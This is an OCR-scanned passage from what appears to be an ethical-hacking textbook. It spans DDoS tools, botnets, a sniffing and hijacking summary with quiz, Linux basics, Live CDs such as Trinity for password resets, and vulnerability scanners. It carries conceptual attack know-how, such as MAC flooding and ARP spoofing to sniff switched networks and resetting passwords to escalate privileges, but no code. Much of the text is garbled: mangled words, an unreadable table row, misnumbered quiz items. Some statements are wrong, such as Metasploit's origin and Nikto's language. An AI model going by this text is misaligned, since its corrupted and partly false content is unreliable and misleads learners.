to send commands and control its agents in order to attack. This software also
includes what could be considered advanced features in the form of encrypted
communication from client to handlers,,

• TFN2K — An upgrade to TVN, it provides some more advanced features
including spoofing of packets and port configuration options. As opposed to
TFN, this software does include encryption features, but not as strong as those
of Stacheldraht.

• WinTrinoo — This software is a Windows port of Trinoo and has the Eibility
to use Windows clients as drones.

• Shaft — This works much the same way els Trinoo. but includes the ability
for the client to configure the size of the flooding packets and the duration
of attack.

• M Stream — This utilizes spooled TCP pEickets to attack a designated victim,
• Trinity — This performs several DDoS functions, including fraggle, fragment,
SYN, RST, ACK, and others.

• Botnets

An advanced type of attack mechanism is a bo met. which consists of systems that are
infected with software such as those used in DDoS attacks. When enough of these systems
are infected, and a critical mass hms been reached, it is possible to use these machines
to do tremendous damage to a victim. Botnets can stretch from one side of the globe
to another and be used to attack a system or carry out a number of other tasks.

296 PART 2 A Technical Overview of Hacking

Botnets can perform several attacks, including:

NOTE

Remember that a botnet
can easily number tnto the
hundreds of thousands or
millions of systems, stretching
from one end of the globe to
another. With these kinds of
numbers, the attacks noted
here take on a new meaning
and destructive capability.

DDoS — This construct makes sense as tin attack method based on the way
a DDoS works and Lhe number of systems thai can be infected.

Sending — Botnets have been used Lo transmit spam and other bogus information
on behciif of their owner.

• Stealing information — Attacks have also been carried
out with botnets to steal information from unsuspecting
users’ systems,

• Clickfraud — This attack is where the attacker infects a large
numb er o f sy s t em s w ilh L b e i d e a t h a 1 1 hey w i 1 1 u se t he i n tec t e d
systems lo click on ads on their behalf, generating revenue
for themselves.

A “bot s is a type of malware that allows an attacker to take control
over an affected computer. Also known as “‘Web robots,” bots
are usually part of a network of infected machines known as a
” botnet, 1 ” which is typically made up of victim machines
that stretch across the globe.

FY!

>

The following is a dipping from an FBI news briefing:

… the Department of Justice and FBI announced the results of an ongoing cyber crime
initiative to disrupt and dismantle “bot- herders” and elevate the public’s cybersecurity
awareness of botnets. OPERATION BOT ROAST is a national initiative. Ongoing investigations
have identified over 1 million victim computer IP addresses/’ http://www.fbi. gov/pressfel/
pr9ssrei07/botnet06 1307.htm

CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 297

cm

CHAPTER SUMMARY

This chapter focused on three types of network attacks: sniffing session hijacking,
and DoS attacks. Each of these attacks represents a powerful weapon in the hands
ul” li skilled attacker.

Sniffing is the process of capturing and analysing traffic In an effort to observe
in lor mat ion that is confidential. Sniffing can be performed on just about any network,
but the technique may require that you adapt based on how the network operates.
In networks with a hub, you can easily sniff using any packet sniffer and starting the
process. On networks that use switches, however, it is different lis the switch prevents
you from seeing what is on a different collision domain. On networks where switching
is used, you will have to use techniques such as MAC Hooding and ARP spooling to
bypass the switch prior to snilling.

Moving beyond or building upon the techniques thai were introduced in sniffing
is the session hijack, which is an aggressive and powerful weapon in the hacker’s
arsenal, A session hijack takes over an existing authenticated session and uses it to
monitor or manipulate the traffic, and even execute commands on a system remotely.
Session hijacking in its most advanced stages directly affects and attacks the integrity
of information in an organisation. An attacker using this technique can modify
information at will as they have the credentials of the victim and whatever the victim

DoS attacks were discussed and you learned how these attacks are used to shut down
and deny legitimate access to and usage of services to users. A DoS is used to target
a service or system and prevent if from being used for legitimate uses for as long as the
attacker wishes, tinder the right conditions, a DoS directly attacks the eonlidentiality
and integrity of data that users have been granted the right to use.

KEY CONCEPTS AND TERMS

Active session hijacking

Passive sniffing

Active sniffing

{CAM)

Promiscuous mod

Fail-open

Session hijacking

{ARP} poisoning

Hub

Switch

Botnet

Lookup table

Collision domain

Passive session hijacking

298

PART 2 A Technical Overview of Hacking

CHAPTER 12 ASSESSMENT

1 . A DoS Is in canl to deny a service from
legitimate usage.

A, True
II False

1. Sniffers can be used to:
A. Decrypt information
E, Capture Information

C. Hijack communications

D, Security enforcement

1. Session hijacking is used to c Lip Lure ci-ljJUc.

A, Trnc

B, False

1. Session hijacking is used to take over
an authenticated session

A, True
K False

1. Active smiling is used when switches
are present.

A. True
IS, False

7.

is used to overwhelm a service.

is used to flood a switch with

is used to fake a MAC address.

A. Spoofing
Flooding
C. Poisoning
IX 11 ij Lie king

1. What type of device can have Its memory
filled up when MAC flooding is used?

A. Hub
li. Switch

C. Router

D. ti ate way

1. What technique is used when traffic
Is captured on a network with hubs?

A. Active sniffing
15. Fassn u –jiilj’iiL
C. MAC Flooding
ll Killer flooding

Linux, Live CDs, and
Automated Assessment Tools

CHAPTER

N TODAY’S BUSINESS ENVIRONMENT, it is likely that you will encounter operating
systems other than the familiar Windows desktop. While Windows still lays
I claim to a large segment of the computers in the world, it is not the only
operating system out there: Operating systems (OSs) such as the Mac OS, UNIX,
and Linux are likely to cross your path at some point.

As a security professional, it is important for you always to have an
understanding of the tools available to you, and in the security field this requires
some knowledge of the Linux OS. Linux is different from Windows and will require
some effort from you to learn, but once It is learned you will have many more tools
available to you through which you can assess the security of your organization.
Linux offers a tremendous number o f bene'” ts (the least of which is that it is Tea;
most important is the amount of tools that will become available to you).

Linux offers benefits that Windows just cannot offer such as Live CDs. Linux
is one of the very few OSs that can be run off of removable media such as flash
drives, CDs, DVDs r and portable hard drives. Linux can be booted off removable
media without being installed on a hard drive or on a computer, eliminating the
need to make changes to the computer itself,

f

Chapter 13 Topics

This chapter covers the following topics and concepts:

What Linux is
■■■ What users, groups, and special accounts are
■ What working with permissions in Linux is

• What commonly used commands are
What ipchains and iptables are
What Live CDs are

• What automated assessment tools are

299

Chapter 13 Goals

When you complete this chapter, you will be able to.

• List the features of Linux
• Discuss the benefits of Linux

• Describe the benefits of Live CDs

• Describe the benefits of automated assessment tools

• Describe the types of automated assessment tools

• NOTE

Linux was originally designed and
created by Linus Ton/aids in 1991
with the help of program mers and
developers around the world. Since
1991, the operating system has
rapidly evolved from a computer
science project to a very usable
mainstream operating system.

Linux

This chapter moves away from Windows to discuss Linux,
which has a great deal in common with an older operating
system — UNIX. Linux offers many of the benefits you would
expect in any modern operating system, but a little differently
from what you may be used to. The first difference is that it is
open source, meaning that anyone can browse the source code.
This design offers a degree of transparency that is not observed
in other operating systems that are closed source, such as
Windows,

FIGURE 13-1

Linux KDE Desktop.

300

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

301

Do not Confuse free and open source because the two terms are not interchangeable.
Free means just that — no charge. Vendors can choose to charge for their version of Linux if
they so choose; however, this charge usually means that they are charging for support instead
of for the product itself. A good example of this is SUSE and OpenSUSE: OpenSUSL is a free
version, and SUSE is Novell’s fee-based version. Open source means that the source code is
available for perusal by anyone. By the terms of the GPL r anyone who makes available their
own version of Linux through customization or other means must also make available the
source code for public review.

While Linux is a largely free and open source operating
system, it is still powerful and useful. Linux is in fact ei very
complete operating system that offers graphical user interfaces
(GUIs) that are easy to use and work with. Linux has also shown
the ability to be very flexible and portable, running on ei wide
range of hardware and devices all offering similar or exactly the
same features and capabilities. Figure 13-1 shows one possible
interface for Linux.

Linux is available in many different variations, known as
distributions, available from many different vendors. These
distributions vary in style, fenunvs. perlunmiLKV am.! usage \v\lh
some bein^ pur pose fully built for a spec Hie situation. A common
misconception is that Linux is always free. In fact it is not always;
some distributions do have an associated fee to purchase them
much like Windows. However* they still make their source code
available with the General Public License (GPL).

Some of the more common distributions of Linux include:

• L’buntu
• Kubuntu

• OpenSuSE

• Fedora

• Debian

• Slack ware

• MEFIS

• At the heart of every operating system is the kernel, which is its core component.
It has control over all the low -level system functions such as resource management,
input and output operation s F and the central processing unit (CPU). The kernel
can be said to dictate the very behavior of the operating system itself In most cases.

MOTE

Linux offers several different
graphical: interfaces including KDE,
Gnome, Fluxbox, and Lightbox.
Conversely, Linux also can be
entirely command line based
with no corresponding GUI.

NOTE

Currently there are more than
2 r 000 distributions of Linux
available in different forms and
formats. While most of these
distributions are very specialized,
it does demonstrate the large
number of distributions available
and the overall flexibility of the
operating system.

302 PART 2 A Technical Overview of Hacking

NOTE

There are many different shells
ava ilable for the Linux platform.
It is up to you to choose what is

best suited and most comfortable

you will not be interacting wiLh the kernel directly; you
will be interacting with it only through the use of a shelL
which is the interface that is either command line- or
graph ical-based. The shell also interacts with devices
such as hard drives, ports, central processing unit (CPU),
Eind other types of devices.

for you. Examples of shells that
are in u&e are Bash H csh, and tcsh
Others are available in Linux

Each of these kernels is built for the specific environ-
ment and operating system. In the case of Linux, there
are multiple versions that are in use across different
distributions that in some cases are customized. This
also shows one of the unique features of Linux and
the Linux kernel, Linux, unlike Windows, can have its
kernel configured by anyone wishing to take the time

distributions as well. The choice
is yours about wbkh is preferable,
and any can generally be used with
little or no loss in functionality.

(and having the knowledge) to do so.

A Look at the Interface

Linux can be used in two different ways — through the command line or through
a GUI. In the Windows world, bolh options are available as well, but most people use
the GUI and never think about the command line. In the Linux world, it is not uncommon
for users to use both; in fact some advanced or hard -core users don’t use the GUI al alL
opting to use the command line Instead. One of the biggest misconceptions about Linux
is that you can only use the command line to operate it. While it is true that the command
line may indeed be the only way to do more advanced operations, it is not your only
option. In fact, Linux has had to introduce more advanced and usable interfaces as
it has become more popular and widely adopted.

One of the biggest differences you will notice in the Linux operating system if you are
transferring in from Windows is how drives are referenced. In Linux, unlike Windows,
drive letters are not used. Instead, drives and partitions are referenced by a using a series
of lileuames in the format:

/dev/hdal/file

There are plenty of people who still believe that the only way to use Linux is to roll up your
sleeves and get intimately familiar with the command line, but this is not the case. Many tools
that you will use as a security professional now have GUIs that make them much easier to use.
Of course, don’t let this become a crutch, because a good understanding and comfort level
with the command line is essential for you to be successful with Linux.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

303

table 13-1 Linux directories and purposes.

DIRECTORY

PURPOSE

i n is represents in e root ot ine rue system, i n is is similar in some respects
to the location C:\ in Windows.

/bin

All executaDies in tn is o irectory are- accessmie any usaoie oy an system users.
This can be considered to be more or less Jike the Windows folder in the
Windows operating system.

/boot

Lon tains an tne tnes tnat are re qui red to sta rt up ana ooot a Lin ux ope rat i n g
system.

/dev

Location where the files that dictate the access between hardware and the
operating system resioe- inese can oe tnougnt ot as □ rivers a no similarly
reSated files.

E- e 1 ar + ^”1″ ~ fc i~ i — l +n c~ ^ r 1 — l ro j — n”f” i n i i r if i <r~»i f-^ n rfc-f rm — \ \ t f-\ f-h 4- j-^ r ~ ^ ■ — s w-ii if — b + 1 j-h n e ^ r~a 1 ^~ti~ — i ^ q j^J

r 1 1 tf s l r i d i d r e lu s l cj i e iu niiyurdiiuri 1 1 1 1 u r i r id 1 1 u n i u r d jj p i iLd l i u r i s d r e i ucd Leu
in this folder. Applications can also store some configuration information in
their own directories.

/nome

I nis location is wnere tne users win store tneir inTormation Dy oetauit, lypicany
their information is stored in per-user subdirectories underneath this folder.

/lib

Library files (mostly C programming language object files) can be found here.
Libraries are shared code that is incorporated into an application later on demand.
Mppticanons ano tne ui store tneir iiorary nies in mis location oy ueTauix.

/mnt

Certain nonpermanent file systems (floppies, CD-ROMs, nfs) are normally
placed nere wnen a aevice is activateo. txampie. vvnen you place a lu into tne
CD-ROM drive, the OS may mount (connect to) the CD file system and display
the directories and files under /mnt/cdrom.

/opt

This directory is used at the administrator’s discretion (optional) but it is typically
used for third-party software.

/proc

This directory contains vital information about running processes on the
Linux system,

/root

The home directory of the root user is contained \r> this special directory away
from normal users.

/sbin

The system binaries directory contains executables that are used by the OS
and the administrator not typically by normal users.

/tmp

A temporary directory for general use by any user.

/usr

Generic directory that contains the body of useful folders and files for use
by Linux users such as executables and documentation.

A/ar

Important directory that contains system variables such as print and mail
spoolers, log filesj and process IDs.

304

PART 2 A Technical Overview of Hacking

.Another difference that exists between Windows Bind Linux is how directories tire
annotated. Tn Windows, directories are referenced with the Lam i Liar ” V. L>ut in Linux
the directories are V” If anything is going to cause you grief as a Windows user
moving to Linux* this is probably it.

Important Linux Directories

When navigating the many different directories in the Linux file system, you will
need to have a good knowledge of the different directories and what they provide
to the user. Table 15-1 lists some of the vital directories in the Linux file system.
Awareness of these built-in directories allows administrators to monitor known
expected files and directories and detect rogue files that have been either accidentally
placed in sensitive directories or maliciously planted to trap unsuspecting system
users.

Users, Groups, and Special Accounts

Linux is an operating system that is designed around a multiuser modeL This design
gives Linux the ability to have more than one user logged in and actively using the
system at any particular time. This makes it necessary for each user to have an
individual user account and home directory to store information. Linux also allows
for different user accounts to be assigned different privileges for different access Levels.
All Linux users on a particular system have an associated user TD. belong to a group,
and have a unique identification number referred to as a IJID (user ID).

Working with user accounts are groups that are used to assign privileges collec-
tively to multipte users. For example, grouping users into units that reflect job
functions or desired access such as accounting, sales, or development wouJd allow
for quick and easy assignment of privileges. With a group you can place users
with the same desired level of access in a group and give that group access instead.
Groups are generally a way to put users together in a logical organization that is
used to assign common access privileges and to simplify administration

In Linux, systems users gain Eiccess to a system only after a special ac count
known as the root user, or super user, has created user accounts and given these user
accounts access. The root user is a very special and unique account because it is the
account that has complete and unrestricted access to all com m ands, files, and other
system components. The su peruser or root account is created on all Linux systems
when the operating system is installed. The root account is the account that must
be used to create user accounts, create groups, assign permissions, and perform
other sensitive system actions. Only the root user can add new groups and users.
The new accounts define the user’s environment and level of access.

New users may be created by doing the following:

CHAPTER 13 Linux, Liv& CDs, and Automated Assessment Tools

305

m h

The root or su peruser account should be used only by those who are more experienced with
the system and understand the consequences of using the account. Unlike with the Windows
operating system, in which it is not unheard of for users to log in as an administrator to perform
tasks, in Linux users are discouraged from using the root account directly. It is normally accessed
only from another account for selected actions.

In some versions of the Linux operating system, such as Ubuntu, the root account is disabled
and cannot be logged into directly. This requires the user to run commands from another
account and selectively grant root access as needed.

• Adding entries in the /clc/passwd iile for the user
• Creating a home directory for the user name (/home/<user_name>

• Assigning a default login shell

• Working with Permissions

I ■ very tile and folder that resides on the hard drive of a Linux system has an associated
set of permissions. These permissions dictate how a particular item may be interacted
with and by whom. Specifically, in Linux access is granted to three types of users that
dictate the level of access that will be permitted, The following are the types of users
associated with every file:

• Owner — Owner (U) of a file is the individual or user account who generated
the file.
• File group — Croup {G \ is the group the owner was logged in under while creating
the file: all users that belong to the file’s group have a common level of access

• to the file.

• Others group — Others (0) group refers to all users on the system other than
the owner and the file’s group mem hers.

Files and directories also have three types of permissions associated with them:

• Read permission al!ow r s users to view a file, but not change or alter the file in any
way. Read permissions to a directory allow users to view the directory’s contents,
but do not permit changes to the directory contents.
• Write permission allows users to modify and save files, and add or delete files
in directories.

• Execute permission allows users to execute a file such as with a command,

• [f applied to a directory, the permission will allow access to files within the directory,

ra

306 PART 2 A Technical Overview of Hacking

table 13-2 Representation of letters for Linux.

d r w
Owner

type

x r w

Group

x r

Other

Write

Execute

In order to view the permissions assigned to each type of user for all the iiies located
in a directory, issue the long listing option ( – 1) of the Is command:

[ Link ] ~S Is -1

total IS

drHxr-xr-xf 2 Link None 0 Nov 26 18:11 Java

rw-r — r– 1 Link None 57 Nov 24 21:21 errors
– rw – r – – r – 1 Link None 55 Nov 24 21:25 eriors.txt

rrt-r–r- – 1 Link None 8728 Nov 24 20:19 lsinfo.txt

rwxr-xr-x 1 Link None 43 Nov 26 01:42 myStript

[ LinuxUser ] -\$

The preceding string of letters for each entry represents the permissions that
correspond to each user or group.:

drHxr-xr-x

NOTE

In some cases, a hyphen
may appear in any of the
permission fields and in this
case the system is stating that
the user has no permissions
of that type.

Table 13-2 illustrates what each letter represents left
to right. Reading the permissions left to right indicates
the following”

• The type of file (or in d for directory)
• The next three represent the user’s permissions

• ■ The next three positions indicate the group permissions

• The last three represent the access provided
to everyone else.

Another example is:
drwxr-xr-x-

This folder allows read, write, and execute permissions for the owner, but only read
and execute for the group and for other users.

CHAPTER 13 Linux, Liv& CDs, and Automated Assessment Tools

Commonly Used Commands

Because of the many tasks that can be performed within a command line or terminal
window, it is vital for you to understand terminal windows and the frequently used
commands* This will require using the knowledge that you acquired earlier of filenames,
directory names, and commands that Eire case sensitive. When at the Linux command
line, you will see a command prompt similar to what is shown here:

[ root@impa /]#.

This command prompt indicates the user account logged in (in this case, root), the
computer name (in this case, impa), along with the current directory (in this case, /},
The # symbol at the prompt indicates that the user account holds privileges, whereas
a prompt that is followed by the I will indicate a user account with standard privileges,

Basic Command Structure

Linux commands share a common form, which is the following:

command <option(s)xaigument(s)>
The command identifies the command you want Linux to execute.

■ The name of a command generally consists of lowercase letters and digits,

• Options modify the way a command works. For example, the – a option
of the Is command generates the output of the command to list ‘”hidden” files
as well as normal files.

root@l inuxhost : /#ls -a

is the same as

root^impa : /#ls -al

FY I

The majority of Linux commands are case sensitive and you should pay very close attention
to this fact. /’■■ : ammand that is entered in uppercase versus lowercase versus mixed case
ib not the same command. For example, look at the Is command:

• Ls
• LS

• Is

• Each of these is considered a different command by the operating system and each will
be interpreted differently.

This behavior is different from Windows, where case doesn’t matter the majority of the time.

308 PART 2 A Technical Overview of Hacking

TABLE 13-3

Linux commands.

COMMAND

PURPOSE

Ls

The list command is similar to the dir command in Windows, with very similar
options, The Is command is used to display all the files and subdirectories
in a given location.

pwd

The pri nt working directory command is similar to the cd command in Windows,
It is used to display the current location the user is in within the Linux directory
structure. This command is very useful especially for the newbies that can get
lost in the Linux file system quite quickly.

pwd

Cd

The change directory command is used to switch between locations in Linux,
This command is identical in operation to the Windows version. The main
difference is the way directories are referenced (remember your slashes).

Important shorthand notations include these:

root of file system: /
current directory: ./

parent directory (the preceding directory): . . /
home directory: «■
cd <path>

mkdir

Make directory is a command used to create new directories in Linux.
The format is as follows;

mkdir <new directory name>

rmdir

Remove directory is a command that is used to remove or delete empty
directories from the Linux fife system. This is the key point, empty; the directory
must be empty or the command will faiL

rmdir directory name>

rm

A more aggressive removal command that removes files or folders. The different
between this command and the rmdir command with respect to directories is
that this command will remove a directory that is not empty. When using this
command on directories, exercise caution,
rm <filename>

cp

A command that is used to copy files from location to location much like the
copy commands in other operating systems.

cp <or iginat locations <new location>

mv

The mv command is used to move files from one location to a new location,
mv <original location> <new location>

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

309

The next detail in commands is the arguments that are used to
specify filenames or other targets, that fine-tune or tweak the action
of the command. For example, the Is command lets you specify a
directory as an argument, which causes the command to list files
in that particular directory:

Some commands provide the
ability to specify a series of

arguments; in these situations
you must separate each

root@impa :/#ls /bin

argument with a space or tab.

Table 13-3 lists a small number of the commands In Linux,
but you should become comfortable with all of them, including
their functions.

Ipchains and Iptables

The Linux operating system offers several tools for controlling traffic to and from a system,
including ipchains and iptables.

Ipchains is an early firewall technology for Linux that controls traffic by checking packets.
Packets encountering the ipchains technology will enter n set of rules known as a chain.
The packet is checked against these rules to see if it matches any known bermviors that
would be considered malicious or incorrect. Traffic that is analyzed and shown to be

u

suspicious will be dealt with accordingly, and traffic t Jt ti t is permitted will be sent on to the
system to make whcit is known as a routing decision. The decision that is made will be based
on whether the destination for the packet is Eitt ached to the device or is remote. A local
device will be sent to the appropriate interface on the device; in iJu? event the destination
is remote, it will be forwarded to a forward chain before being sent onto an output chain
and on toward its destination.

So what are chains? Ipchains are m ride up of rules< and each rule is composed of a
set of definitions that specifies which packets must match it and what to do if the packet
matches the rule. Every packet that arrives or departs a computer will be processed by
at least one chain, and each rule on the chain will be compared with the packet. If one
malt – lies the packcl . the pruivr»s sicips. and I he rule is read to deLerir.mu vvhui io do with
the packet When a packet traverses a whole chain and no match is found, a policy defined
for the chain is followed that dictates what to do with the packet.

One of the problems with ipchains is simplicity; the process described here is complex
and time-consuming to perform on eEich packet, In response to this, a new packet-filtering
framework known as netfiller was designed with the goal of simplifying and improving
the process of packet filtering. Net filter introduced cleaner packet filtering as well as
improved flexibility compared with ipchains.

pchains

310 PART 2 A Technical Overview of Hacking

rt FYI

Iptables is a utility used to set up, maintain, and inspect the packet-filtering rules in Linux. Iptables
handles packets in two ways: chains and tables. A chain is a set of rules that tells iptables how
to manipulate a packet that matches a given rule. Even with no user-defined iptables statements
on your router, each packet passing through the router will flow through at least one oi the three
predefined chains in the operating system:

IPtables

Iptables is the successor to ip chains and introduces a more efficient method of processing
packets than ipchains offers, Iptables builds on the technology introduced in netfilter and
uses some of the modules of the software to make a more robust technology. Iptables and
ipchains both process packets, but iptables goes one step further than ipchains. Although
ipchains uses rules arranged in a list or chain, iptables builds on this by adding tables
to the mix. Iptables uses these tables to decide how to handle a packet whether it is to
network address translation (NAT) or perform some other type of filtering on the data.
As opposed to chains, this table format allows for a much greater degree of flexibility than
Ipchains because the ability to filter packets is more dynamic. Furthermore, the changes
introduced in iptables means that a packet will pass through only one tillering point
during its process, as opposed to ipchains, in which a packet can pass through multiple
points on its journey across the network.

Live CDs

Something that is available in Linux timl is somewhat unusual is a Live CD, Live CDs
are pieces of media that contain a complete and bootable operating system. This is
very different from the w T ay items such as boot floppies were in the past. In the case
of boot floppies, a completely functional operating system was just not possible —

t- j fyi )

Don’t let the term Live CD fool you; you can run these live distributions oft of any type of media
including CDs, DVDs r portable hard drives, and USB flash drives. In fact r an increasing number
of Linux users are installing live distributions on high-capacity flash drives in which they can store
the entire operating system, all applications, and their data. When installed on a flash drive in
this manner, you can literally carry your entire desktop from system to system and have the same
experience no matter where you go.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

except in the early days of Direct Operating System (DOS). With Live CD, you can run an
operating system that is fully featured and functional, and gives the same experience as
the operating system when it is installed on the hard drive of a computer. For all intents,
and purposes, in this course you can say that just Eibout every distribution of Linux is
available in a Live format, with few exceptions.

One of the bigger benefits of a Live CD is that you can boot a computer off a Live CD
and not make any alterations to the existing operating system on the computer’s hard
drive. When running a Live CD, the computer boots off the given media and uses the
operating system that is running totally off the removable media. This can be useful for
evaluating the operating system prior to making changes to the computer in any way.
You could also use this for evaluating hardware support and compatibility. You can also
use a Live CD to trouhleshoot hardware (for example, when a piece of hardware fails or
to recover a corrupted operating system).

Other common uses of live distributions include:

• Installing Linux on a new system
■ Testing new software
• Evaluating different hardware configurations

• Re pa iri n g d a m aged s y stem s

• Guest systems

• Portable systems

• Pentesting

• Multiboot

• Forensics

• Providing a secure n on- alterable operating system

• Kiosks

• Persistent desktops

• As with most live distributions, the ability to return the system to whatever state it
happened to be in prior to the installation is standard. The process is simple: Boot off the
live media and use the operating system; when you are done, shut down the operating
system, eject the media, reboot, and you are back where you started. The downside of
live distributions is performance; because the entire operating system is being run from
physical memory, the performance will be less than if it were in si a lied on the physical
hard drive. Essentially the entire operating system is running from random access
memory (RAM ) along with all the applications, which means less RAM to go around.
However, the amount {if RAM required for Linux is quite low, with some Linux distribu-
tions being able to run in memory as little as 32 Mil.

312 PA RT 2 A Tech nical Overview of H ack i ng

• i ™ )

When evaluating Linux as a live distribution, always factor in this performance penalty.
Live distributions run everything from physical memory, and anything that is not in memory
will have to be retrieved from the physical media {such as the CD). Because media such as
CDs and DVDs will be slower than a hard drive, you will notice a lag for features you have
not accessed previously {this lag will be less on flash drives).

I

While the majority of Live CDs are designed for you to test drive an operating system,
there are CDs designed for other uses. Live CDs are available that are used for forensic
purposes, malware removal, system recovery, password reset, and other uses.

Although the majority of Live CDs can run in memory to free the optical drive or other
media for other uses, loading the data off of a CD-ROM will always he slower than a hard
drive-based installation. With larger operating systems there will he a substantial penalty
incurred while the required information is loaded off the media, but with smaller images
image into physical memory provides substantial performance benefits because RAM
is much faster than a hard drive.

Special Purpose Live CDs

Live CDs can be generic or very specific and purpose-built
Purpose-built CDs are different from other, more commonly found
live distributions in that someone built them with a very unique
purpose or need in mind. In the case of regular Live CDs. the live
distribution provides all the information needed to run a regular
operating system and even provides the ability to install the OS.
In the case of purpose-built CDs this may not be true: in fact, some
of the Linux distributions (distros) may not even have the ability
to install

Some examples of purpose-built distributions include:

• Firewalls

• Rescue disks

■ Password reset (such as Trinity)

Trinity

The Trinity Rescue Kit (TRK) is a Linux distribution that is specifically designed to be run
from a CD or flash drive. The TRK was designed to recover and repair both Windows and
Linux systems that were otherwise unbootable or unrecoverable. While the TRK was
designed for benevolent purposes, it can easily be used to escalate privileges by resetting

NOTE

Typically, purpose-built
distributions of this type
Include firewall applications,
rescue disks, security tools,
multimedia versions, and
others. In somecases 4 these
distributions wfl I not even
have an option to install to
the hard drive — allowing
the OS only to run from the
media.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

313

Trinity can be used to change a password by booting
the target system off of a CD or flash drive and entering
theTRK environment. Once in the environment, a simple
sequence of commands CEin be executed to reset the password
of an account.

Caine

Computer Aided INvestigative Environment (CAINE) is based on
the popular Ubuntu Linux live distribution and was created by
Digital Forensics for Interdepartmental Centre. The distribution
contains a collection of tools wrapped up into a user-friendly
environment. It has features that allow for the collection and
analysis of evidence tor investigative purposes. The distribution
rich forensic functions.

NOTE

Trinity can be used as a follow-
on toot to the enumeration
techniques discussed earlier
Trinity works best when you
know the name of the account
to be changed. The enumeration
techniques shown previously
allow you to browse the
accounts on a system and select
a target account.

Astaro

Astaro is an integrated all-in-one iirewall: a full hardened OS designed to host
a iirewall and perform all the functions of such an application such as stateful
packet inspection, content filtering, application proxies, and IP Sec- based virtual
private networks (VPNs). It is intended to enforce network security without
sacrificing performance, allowing branch offices, customers, and suppliers to

Damn Vulnerable Linux

Damn Vulnerable Linux (DVL) is a version of Linux that is based on the popular
Slackware and Slax-based live DVD. The distribution is designed to be purposefully
filled with broken, ill-configured, outdated* and exploitable software. It is intended as
a training aid or research tool that demonstrates various security concepts such as
reverse code engineering, buffer overflows, shell code development, Web exploitation,
and SOL injection.

Network Security Toolkit (NST)

Network Security Toolkit (KST) is a distribution based on the l 7 edora Core OS,
which was engineered to provide quick access to several open source network security
applications, and runs on x86 platforms. The goal of developing this distribution
is to provide a comprehensive set of open source network security tools. This distri-
bution can be used to transform an x8f> systems (Pentium II and above) into a system
designed for network traffic analysis, intrusion detection, network packet generation,
wireless network monitoring, a virtual system service server, or a sophisticated
network/host scanner.

314 PART 2 A Technical Overview of Hacking

Automated Assessment Tools

There are many tools available for performing network testing in the Linux wo rid:
so many, in fact, that there is no way to mention every tool and package. In this section,
you will be introduced to some of the more widely used tools for performing security
lesling that are based on the Linux platform.

As a security professional you will quickly learn that you cannot perform every
security test manually. In fact, many of the tests that you will be required to perform
are best left to automated tools. With the rapid evolution and deployment of threats and
the vulnerabilities associated with them, automated tools allow for the quick discovery
and subsequent process of addressing these problems.

As a security professional, you will most likely use a broad and diverse combination
of automated and manual assessment tools. Use an automated assessment tool and then
follow up with manual tools and analysis where appropriate. What an assessment tool
looks for depends on the tool in use, but it can be anything from applications, individual
systems, or an entire network:

• S ource code scan ner s i n clud e those sc an n er s spec i fi c ally d esign ed to exam i n e
the source code of an application.
• Application scanners are those that are designed to analyze the weaknesses
in a specific application or type of application.

• System scanners analyze systems and /or networks for a wide range of configuration
or other types of application-level problems.

• Source Code Scanners

Source code scanners are employed by those who need to locate security problems that
exist in the source code of applications. Scanners in this category have the ability to detect
software problems that include buffer overflows, privilege escalations, and other software
errors and defects:

■ Buffer overflows that would enable data to be written over portions of or alter
an executable, which would enable tin attacker to perform any number of acts

• Race conditions that would cause a system to function incorrectly and even
deny Eiccess to resources to those authorized to use them
• Privilege escalation such as when a piece of code executes with higher
privileges than should be allowed by the user who Initiated the execution

• Lip ui validation errors when data is either wholly or partially unchecked
as it passes through the applications potentially causing errors

Some tools used to find these types of problems include;

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

315

• Flawfinder — An application written in the Python programming language.
This program can search through the source code of an application looking for
security flaws. Generates a report with flaws organized by priorily or seriousness.
• Rough Auditing Tool for Security (RATS) — Authored in C. this program contains
the ability to process rules for analyzing source code; these rules are written in XML.

• StackGuard — A special compiler that is designed to build applications that are
hardened against specific types of attacks. Programs run through this compiler
tend to be largely or completely immune to spec i lie types of attacks afterward,

• ■ Unsafe — GenerEites a protection method that has the trait of not requiring
applications to be recompiled. It guards against buffer overflows and can protect
applications for which the source code isn’t available.

■ Metasploit — This application is authored in the Ruby development language, and
was created in 2(103 as a portEible network game using the Perl scripting language.
This application is known for uncovering some of the most sophisticated exploits
lei public securiu VLiluuraoilUies, Tiiis L:>uJ i> also useful to security researchers
for its ability to analyze, security vulnerabilities.

Application Level Scanners

Application vulnerability scanners are used to analyze applications that hai r e been
compiled rather than the application’s source code it sell. Tools in ibis CEitegory look for
potential vulnerabilities that can be uncovered as the application is executing. Scanners
of this type can look at every aspect of a n application including the compiled components g
and configuration. Some examples of application-level scanners are:

Whisker One — An application scanner designed to analyze Web applications.
Specifically, this scanner is designed to look for errors in the Web server-side scripting
language known as Common Gateway Interface (CGI), Under the right conditions,
CGI is a powerful and effective scripting language. Under less than ideal conditions,
this language can lead to information leakage that can allow an attacker to observe
con ft dent ia I information and run unauthorized commands.

• N-stealfh — This application scanner has the ability to analyze thousands of security
faults in applications and provide results in a formatted structure.

Weblnspect — A Web application vulnerability scanning tool. Can scan for more
than 1.500 known Webserver and application vulnerabilities and perform smart

■ Nikto Simple — A Web vulnerability program that is fast and thorough, written
in Ruby. It even supports basic port scanning to determine whether a Web server
is running on any open ports.

• App Detective — This application-level scanner performs penetration and audit tests.
It doesn’t need any special permissions; the test queries the server and attempts to
glean information Eibout the database it is running, such as its version.

316

PART 2 A Technical Overview of Hacking

System- Level Scanners

These types of scanners can probe entire systems and associated services and components.
A system -level scanner can be run against a single address or a range of addresses and
can also test the effectiveness of layered security measures, such as a system running
behind a firewall.

System-level scanners are not perfect. They have the ability to audit the source of the
processes that are enabling services, and they use the resulting responses of a service to
q iinile number of probes, meaning that all possible inputs cannot be reasonably tested.
System-level scanners have also been known to crash systems in some cases, which
could impact system availability.

Some of the more popular system level si’n oners include:

» N essus — The we ll-kn ow n com pre h ens ive, cro ss-pl a I fo rm . ope n so u rce vuln era b ility
scanner with command line interface (CLI) and GUI interfaces. Nessus Is a security
scanning and auditing tool that scans the ports and services a system exposes
looking for vulnerabilities.

• Nmap — A security scanner used to discover hosts and services on a computer
